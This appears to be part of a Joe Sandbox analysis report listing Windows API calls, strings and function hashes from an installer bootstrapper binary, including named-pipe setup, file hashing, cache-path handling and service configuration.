                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 00914F0D
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,0090452F,?), ref: 00914F16
                                                                                                                                                                    • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0090452F,?), ref: 00914FB8
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?), ref: 00914FC5
                                                                                                                                                                    • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,0090452F), ref: 00915040
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0090452F,?), ref: 0091504B
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0090452F,?), ref: 0091508B
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,0090452F,?), ref: 009150B9
                                                                                                                                                                    Strings
                                                                                                                                                                    • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 00914F08
                                                                                                                                                                    • \\.\pipe\%ls, xrefs: 00914F6E
                                                                                                                                                                    • Failed to allocate full name of cache pipe: %ls, xrefs: 00915022
                                                                                                                                                                    • Failed to allocate full name of pipe: %ls, xrefs: 00914F84
                                                                                                                                                                    • \\.\pipe\%ls.Cache, xrefs: 0091500C
                                                                                                                                                                    • Failed to create the security descriptor for the connection event and pipe., xrefs: 00914F44
                                                                                                                                                                    • Failed to create pipe: %ls, xrefs: 00914FF6, 0091507C
                                                                                                                                                                    • pipe.cpp, xrefs: 00914F3A, 00914FE9, 0091506F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
                                                                                                                                                                    • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                                                                    • API String ID: 1214480349-3253666091
                                                                                                                                                                    • Opcode ID: 0b21130afe9bc559f3d3f3a84376ac2acdb3dc2a04b0c33f5509c09a19ffab87
                                                                                                                                                                    • Instruction ID: 5596261d3ee9f277a42b857bc67656bd07ad1b1d47b047fd994ad48baba5dc6b
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b21130afe9bc559f3d3f3a84376ac2acdb3dc2a04b0c33f5509c09a19ffab87
                                                                                                                                                                    • Instruction Fuzzy Hash: CE51C636E40629FBDB219AE58C46FDE7B68AF48725F120160FE14B62D0D3B55E80DBD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,00919F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 0093FAC7
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FAD1
                                                                                                                                                                    • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 0093FB0E
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FB18
                                                                                                                                                                    • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 0093FB5F
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 0093FB83
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FB8D
                                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 0093FBCA
                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0093FBE1
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FBFC
                                                                                                                                                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 0093FC34
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FC3E
                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 0093FC77
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FC85
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                                    • String ID: cryputil.cpp
                                                                                                                                                                    • API String ID: 3955742341-2185294990
                                                                                                                                                                    • Opcode ID: a6b4a96447d4abaac9e68b08558eb971d652e54444923516aa5952177d183ff7
                                                                                                                                                                    • Instruction ID: 89995fb2717c3dad014dae15bba59f29c7a102a4ef6190c9bd5ffe0d2396b0b8
                                                                                                                                                                    • Opcode Fuzzy Hash: a6b4a96447d4abaac9e68b08558eb971d652e54444923516aa5952177d183ff7
                                                                                                                                                                    • Instruction Fuzzy Hash: AD51C577D50239ABDB318A55CC25FDBBAB8AF04751F0141B5BE48FA180E7B49D809EE0
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to concat complete cached path., xrefs: 00919EF4
                                                                                                                                                                    • Failed to transfer working path to unverified path for payload: %ls., xrefs: 00919FA4
                                                                                                                                                                    • Failed to reset permissions on unverified cached payload: %ls, xrefs: 00919FF1
                                                                                                                                                                    • moving, xrefs: 0091A029
                                                                                                                                                                    • Failed to create unverified path., xrefs: 00919F6E
                                                                                                                                                                    • copying, xrefs: 0091A030, 0091A038
                                                                                                                                                                    • Failed to move verified file to complete payload path: %ls, xrefs: 0091A06C
                                                                                                                                                                    • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 00919FCB
                                                                                                                                                                    • Failed to get cached path for package with cache id: %ls, xrefs: 00919EC8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                                                                                                                                    • API String ID: 0-1289240508
                                                                                                                                                                    • Opcode ID: 48049d552ea2dc7148e6b11347a8c80462a5ef0f56a2f8d2ecdbf89ef33b0730
                                                                                                                                                                    • Instruction ID: 8b2498c0249c13a0abc593cad4ed4d8e83ac2eebf39657ffe76b60d617e78851
                                                                                                                                                                    • Opcode Fuzzy Hash: 48049d552ea2dc7148e6b11347a8c80462a5ef0f56a2f8d2ecdbf89ef33b0730
                                                                                                                                                                    • Instruction Fuzzy Hash: C4517F31E0511DFBDF226EA4CD12FED7B76AF49710F100151FA00B61A1E7729EA1AB81
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetVersionExW.KERNEL32(0000011C), ref: 009062F8
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906302
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastVersion
                                                                                                                                                                    • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 305913169-1971907631
                                                                                                                                                                    • Opcode ID: 5f67571c5419697e1baf0faf427569c273b61722aa2461555c3bf6bcbf18370c
                                                                                                                                                                    • Instruction ID: 6c526a345aa5715a0dba8ad8c7923d67cd9bee2c79bd4412609408b5846ed941
                                                                                                                                                                    • Opcode Fuzzy Hash: 5f67571c5419697e1baf0faf427569c273b61722aa2461555c3bf6bcbf18370c
                                                                                                                                                                    • Instruction Fuzzy Hash: 6941B372A04228AFDB209B699C49FEF7BB8EB86710F00059AF545E7190D7349E90CB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00906062
                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00906076
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906088
                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 009060DC
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009060E6
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get the Date., xrefs: 0090610B
                                                                                                                                                                    • Failed to set variant value., xrefs: 00906124
                                                                                                                                                                    • variable.cpp, xrefs: 009060A3, 00906101
                                                                                                                                                                    • Failed to get the required buffer length for the Date., xrefs: 009060AD
                                                                                                                                                                    • Failed to allocate the buffer for the Date., xrefs: 009060C4
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                    • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 2700948981-3682088697
                                                                                                                                                                    • Opcode ID: 5f7ce323ca3c6390c0f69d398aee25a77a963473e4b0c460ec13dace667e97ea
                                                                                                                                                                    • Instruction ID: e1343a2ff063429a568e50246cf1ecd19b333a3007226187aab3d0fbe6bccf26
                                                                                                                                                                    • Opcode Fuzzy Hash: 5f7ce323ca3c6390c0f69d398aee25a77a963473e4b0c460ec13dace667e97ea
                                                                                                                                                                    • Instruction Fuzzy Hash: 4631B536A4522A7FDB119BEA8C86FAFBAB8AB44710F110425FE00F72C1D7709D5096E1
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0096B5FC,00000000,?,?,?,?,009212CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0093FEF4
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,009212CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0093FF04
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0093FF0D
                                                                                                                                                                    • GetLocalTime.KERNEL32(8007139F,?,009212CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0093FF23
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0096B5FC,009212CF,?,00000000,0000FDE9,?,009212CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0094001A
                                                                                                                                                                    Strings
                                                                                                                                                                    • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0093FFC0
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                    • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                                    • API String ID: 296830338-59366893
                                                                                                                                                                    • Opcode ID: cffda8cfbeaff5ec2fbcd72779188d6656e55d03e9e505577ebeef1b01e2bc88
                                                                                                                                                                    • Instruction ID: c6a88122b5bc4ad5c1bc1728865d11e307ed6ef3fad08a4168f3812ee8d61c76
                                                                                                                                                                    • Opcode Fuzzy Hash: cffda8cfbeaff5ec2fbcd72779188d6656e55d03e9e505577ebeef1b01e2bc88
                                                                                                                                                                    • Instruction Fuzzy Hash: 96419071D04219ABDF219FA4DC55FBEB7B8EB49711F000029FA01E6250E734CD80EBA1
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 00919BF2
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00919C19
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00919C79
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00919C84
                                                                                                                                                                      • Part of subcall function 00903CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00903D40
                                                                                                                                                                      • Part of subcall function 00903CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903D53
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                                                                                                                    • String ID: *.*$.unverified
                                                                                                                                                                    • API String ID: 457978746-2528915496
                                                                                                                                                                    • Opcode ID: bb302498c03cbc1fc65fc6318345f07c2251edca02b8d4aea0683f2fbf269373
                                                                                                                                                                    • Instruction ID: e8c0048dd07bfa2601b35f7c8d503f170042dbfc493512e1561035a4253e4eef
                                                                                                                                                                    • Opcode Fuzzy Hash: bb302498c03cbc1fc65fc6318345f07c2251edca02b8d4aea0683f2fbf269373
                                                                                                                                                                    • Instruction Fuzzy Hash: D7418030A0452CAEDB21AB64DD5DFEAB7FCAF84301F4001A1E889E10A1EB719EC4DF54
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 009488D0
                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 009488E2
                                                                                                                                                                    Strings
                                                                                                                                                                    • crypt32.dll, xrefs: 009488A0
                                                                                                                                                                    • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 009488B9
                                                                                                                                                                    • feclient.dll, xrefs: 009488AA
                                                                                                                                                                    • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 0094892D
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                                    • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                                                                                                                                    • API String ID: 1772835396-1985132828
                                                                                                                                                                    • Opcode ID: 9f9976684f47efa450a7934eb30f485a464fb5b513a585eb3b1bd4f8dadc6c1f
                                                                                                                                                                    • Instruction ID: 6c4a1c3cd7bebccc19b5bb2d98b5ae593b4cdc6565a1bd7a449efab216468f77
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f9976684f47efa450a7934eb30f485a464fb5b513a585eb3b1bd4f8dadc6c1f
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C21F8A6900128EADB60DB9ADC05FBFB3FCEB5C711F00455AF955E2180E7799A80D770
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                    • Opcode ID: 024b549c1cd8daf85b367d13436571d5ca0663fd419591e6e68212047976c671
                                                                                                                                                                    • Instruction ID: 12b4d17cd53c8f4545b207e1d89bcce61a8b0c4882616e0c3f0a7b1083ae2aec
                                                                                                                                                                    • Opcode Fuzzy Hash: 024b549c1cd8daf85b367d13436571d5ca0663fd419591e6e68212047976c671
                                                                                                                                                                    • Instruction Fuzzy Hash: B7C25D71E086288FDB25CF28DD417EAB7B9EB84305F1445EAD54EE7240E778AE818F41
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastNameUser
                                                                                                                                                                    • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 2054405381-1522884404
                                                                                                                                                                    • Opcode ID: 8cc44018e5d04a438952d0416107a12f28eb19c5926f9b0f3efa823c7d9800cd
                                                                                                                                                                    • Instruction ID: fcc390db1088c4cb77b3f8f201c02a5afb20f6416c4de80e7d53b592dad2d73a
                                                                                                                                                                    • Opcode Fuzzy Hash: 8cc44018e5d04a438952d0416107a12f28eb19c5926f9b0f3efa823c7d9800cd
                                                                                                                                                                    • Instruction Fuzzy Hash: 6401D676A052386BC720DB599C46FAB77AC9F41720F000255FC14E7281DB749D409BD5
                                                                                                                                                                    APIs
                                                                                                                                                                    • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,009404F4,?,?,?,?,00000001), ref: 0093FE40
                                                                                                                                                                    • GetLastError.KERNEL32(?,009404F4,?,?,?,?,00000001,?,00905616,?,?,00000000,?,?,00905395,00000002), ref: 0093FE4C
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,009404F4,?,?,?,?,00000001,?,00905616,?,?), ref: 0093FEB5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                    • String ID: logutil.cpp
                                                                                                                                                                    • API String ID: 1365068426-3545173039
                                                                                                                                                                    • Opcode ID: d7f0b7b1fdd87f23ccf418eee50bcedd1c3244e1e0c4bbcf53c77fdf996f2d82
                                                                                                                                                                    • Instruction ID: e44d52d868963ddeca22008b6573e93c838df8ec82293ded653d328a0ee54306
                                                                                                                                                                    • Opcode Fuzzy Hash: d7f0b7b1fdd87f23ccf418eee50bcedd1c3244e1e0c4bbcf53c77fdf996f2d82
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B11CE36A00129EBDF319F84CD15EAF7B69EF54B11F018029FD0496171D7318E20EAA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00926B32,00000000,00000003), ref: 00926B9F
                                                                                                                                                                    • GetLastError.KERNEL32(?,00926B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00926F28,?), ref: 00926BA9
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set service start type., xrefs: 00926BD7
                                                                                                                                                                    • msuengine.cpp, xrefs: 00926BCD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChangeConfigErrorLastService
                                                                                                                                                                    • String ID: Failed to set service start type.$msuengine.cpp
                                                                                                                                                                    • API String ID: 1456623077-1628545019
                                                                                                                                                                    • Opcode ID: 042f9cadaabaa9294e337b702789e4df5984318a8b352278663476f2971b2b8a
                                                                                                                                                                    • Instruction ID: f73bcf4905219f29d90c61eaf89d600c8490fcebb8bacde154cca97e4cc78d3f
                                                                                                                                                                    • Opcode Fuzzy Hash: 042f9cadaabaa9294e337b702789e4df5984318a8b352278663476f2971b2b8a
                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF0E53764E1353B8730669AAC09E8F7E5C9F02BB1B114321FE38FA5D4DA61CD0082E0
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00933D6E
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00933D78
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 00933D85
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                    • Opcode ID: f40dca3d436c437efaeea25bc69fa422f7f8193b89fe05c7b8516e98ea2e81a7
                                                                                                                                                                    • Instruction ID: d610e294396c44c9d301acdb590ebe26483fafddd1568ceacdcae0c20b90f9a5
                                                                                                                                                                    • Opcode Fuzzy Hash: f40dca3d436c437efaeea25bc69fa422f7f8193b89fe05c7b8516e98ea2e81a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 5031F47491122CABCB21DF65E988B8CBBB8BF08710F5041EAE81CA7251E7309F818F45
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                                    • Instruction ID: 86970605640f64eac4adb334922bcb97c03a3550504a08b15ff6dfb489939bb7
                                                                                                                                                                    • Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                                    • Instruction Fuzzy Hash: A9021A71E002199FDF14CFA9C8806AEB7F5EF88324F25816AD959E7384D731AE418F91
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00943BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00943A8E,?), ref: 00943C62
                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00943AB2
                                                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00943AC3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2114926846-0
                                                                                                                                                                    • Opcode ID: 912bf1c200a6cdc5a686d85945e71450e36d6c083f93522413311af70c8df80b
                                                                                                                                                                    • Instruction ID: 5715a37e3b78f85c68bc6173a493f2c6c80b1ac954ec1fa6a1abb8c93d9431ee
                                                                                                                                                                    • Opcode Fuzzy Hash: 912bf1c200a6cdc5a686d85945e71450e36d6c083f93522413311af70c8df80b
                                                                                                                                                                    • Instruction Fuzzy Hash: 2C11057194021EABDB10DFB5DC85FAFBBBCFF08300F50882EA552A6151E7709A44CB65
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(0092923A,?,00000100,00000000,00000000), ref: 0094447B
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00944487
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 0$comres.dll
                                                                                                                                                                    • API String ID: 0-3030269839
                                                                                                                                                                    APIs
                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0093EE77,?,?,00000008,?,?,0093EB17,00000000), ref: 0093F0A9
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0092EC20
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,0092E131), ref: 0092E9E1
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                    • Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                                                                    • Instruction Fuzzy Hash: 42C1B2321051A24BEF2D823A847507EBBE55AD27B1B1A179DE4F3CB0D5EE20D634DE20
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                                    • Instruction ID: 1f83ba7e5c6a9a7c99df432497defc9a672367daea291dd42b54e8b67ae18f3a
                                                                                                                                                                    • Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
